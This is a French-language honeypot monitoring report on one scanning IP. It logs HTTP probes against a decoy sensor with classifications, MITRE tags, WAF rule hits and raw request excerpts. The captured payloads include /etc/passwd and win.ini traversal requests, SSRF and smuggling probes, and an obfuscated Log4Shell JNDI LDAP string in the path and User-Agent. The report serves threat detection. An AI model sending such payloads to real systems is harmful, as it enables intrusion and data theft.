Profil de menace
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Période analysée : 2026-05-03 → 2026-08-01
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Campagne de scan — plusieurs IP du même /24 (34.19.127.0/24, ≥3 pairs)
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance 64 % — Score WAF 72 · Bonus corrélation +10 · 3 tag(s) WAF
ASN 396982 · 34.19.0.0/17 · ARIN — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 61 événements sur la période pour cette IP.
Même FAI Google LLC — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
61 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
61 événement(s) — page 1/2
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8889 · HTTP | http | SSRF interne ssrf internal · via HTTP:8889 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8889
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8889 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8889 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8444 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8444 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /
Émulateur
HTTP
WAF
7
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8444
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag query-overlong) · confiance 80%
Confiance classification
90%
Corrélation +10
Risque capteur
Moyen
· 40
Confiance : Confiance 80 % — Score WAF 36 · 2 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
query-overlong
sap-sapcontrol-path
Payload (extrait)
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Requête brute (extrait)
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
|||||||
| TCP | 8005 · HTTP | http | Scan de ports port scan syn · via HTTP:8005 · (reconnaissance) | Élevée | Moyen · 54 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8005
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8004 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8004 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 67 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8004
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:8004 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleW
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:8004 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8004 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8004 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 67 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8004
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8004 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) A
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8004 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 7006 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:7006 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /
Émulateur
HTTP
WAF
7
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7006
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag query-overlong) · confiance 80%
Confiance classification
90%
Corrélation +10
Risque capteur
Moyen
· 40
Confiance : Confiance 80 % — Score WAF 36 · 2 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
query-overlong
sap-sapcontrol-path
Payload (extrait)
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Requête brute (extrait)
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
|||||||
| TCP | 8002 · HTTP | http | SSRF interne ssrf internal · via HTTP:8002 · (tentative d'exploit) | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8002
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 52
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8002 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8002 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 3128 · HTTP | http | SSRF interne ssrf internal · via HTTP:3128 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3128
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8111 · HTTP | http | Scan de ports port scan syn · via HTTP:8111 · (reconnaissance) | Élevée | Moyen · 56 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8111
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Moyen
· 56
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8111 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8111 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8080 · HTTP | http | SSRF interne ssrf internal · via HTTP:8080 · (tentative d'exploit) | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 54
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8080 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8080 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8080 · (tentative d'exploit) · → /upload_test.txt | Élevée | Moyen · 61 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
POST /upload_test.txt UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
17
Recommandation
Investiguer
Tags
Cible HTTP
POST
/upload_test.txt
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/upload_test.txt
Service
HTTP
Pourquoi cette classification : Type « http_smuggling_probe » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 61
Confiance : Confiance 95 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
body-entropy
Payload (extrait)
POST /upload_test.txt HTTP/1.1 Host: 62.3.50.33:8080 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Requête brute (extrait)
POST /upload_test.txt HTTP/1.1 Host: 62.3.50.33:8080 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/octet-stream Content-Length: 1 |
|||||||
| TCP | 8291 · HTTP | http | SSRF interne ssrf internal · via HTTP:8291 · (tentative d'exploit) · → /%5cgoogle.com/4af206ebd4.html | Élevée | Moyen · 57 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /%5cgoogle.com/4af206ebd4.html UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/%5cgoogle.com/4af206ebd4.html
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8291
Chemin / cible
/%5cgoogle.com/4af206ebd4.html
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 57
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: 62.3.50.33:8291 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac O
Requête brute (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: 62.3.50.33:8291 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8081 · HTTP | http | SSRF interne ssrf internal · via HTTP:8081 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8081 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8081 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 7003 · HTTP | http | SSRF interne ssrf internal · via HTTP:7003 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7003
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 9090 · HTTP | http | Sonde port 9090/TCP port 9090 tcp · via HTTP:9090 · (sonde / probe) · → /${${5x6:-j}${ipt:-n}${yi:u:-d}${5c:-i}${w3v:57… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
PUT /${${5x6:-j}${ipt:-n}${yi:u:-d}${5c:-i}${w3v:57:n5qp:-:}${jl:j:-l}${y:-d}${tbh2:2u:-a}${3we:42kn:-p… UA ${${01:xe:26bl:-j}${y8:fi:-n}${s:db:m3s:-d}${lifo:p2v:-i}${x30:…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${5x6:-j}${ipt:-n}${yi:u:-d}${5c:-i}${w3v:57:n5qp:-:}${jl:j:-l}${y:-d}${tbh2:2u:-a}${3we:42kn:-p}${g:dx6:-:}${jqa8:r:o:-/}${q4:-/}${7f:3r:bd:-P}${bkgc:-A}${wd:4x8s:-l}${vq:4:-0}${u3:-c}${ifv:--}${${uj10:-s}${i:-y}${lcf:jkd:c:-s}${va:4y:-:}${hy:-j}${j:u9d:-a}${j:48:oen1:-v}${o:p0f:bml:-a}${dn4c:8je:u:-.}${7:vf:w:-v}${75b:-e}${gmfb:p:-r}${0kav:n1z7:-s}${0nv:8:-i}${xqc:10:-o}${o4da:l:7p:-n}}${qa:ytnb:6v5:-.}${d:a2:3lw:-b}${yi3a:7oq:g:-c}${a87:u0:91:-e}${vsw:3c:b7:-8}${vq:-7}${dsru:t:-7}${s46:res:-c}${e:to:-
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
9090
Chemin / cible
/${${5x6:-j}${ipt:-n}${yi:u:-d}${5c:-i}${w3v:57:n5qp:-:}${jl:j:-l}${y:-d}${tbh2:2u:-a}${3we:42kn:-p}${g:dx6:-:}${jqa8:r:o:-/}${q4:-/}${7f:3r:bd:-P}${bkgc:-A}${…
Preuve honeypot — Sonde port 9090/TCP
Connexion détectée sur le port 9090 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9090_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${01:xe:26bl:-j}${y8:fi:-n}${s:db:m3s:-d}${lifo:p2v:-i}${x30:8qyj:z61c:-:}${0:7c:-l}${wtvj:q7:n:-d}${cuf:m4c:-a}${q0l:xkd:-p}${vfy3:-:}${ak:-/}${q7s:dxbi:-/}${ft3:2ih:-U}${mc:23u:-A}${g:8vhx:-l}${3…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${5x6:-j}${ipt:-n}${yi:u:-d}${5c:-i}${w3v:57:n5qp:-:}${jl:j:-l}${y:-d}${tbh2:2u:-a}${3we:42kn:-p}${g:dx6:-:}${jqa8:r:o:-/
Requête brute (extrait)
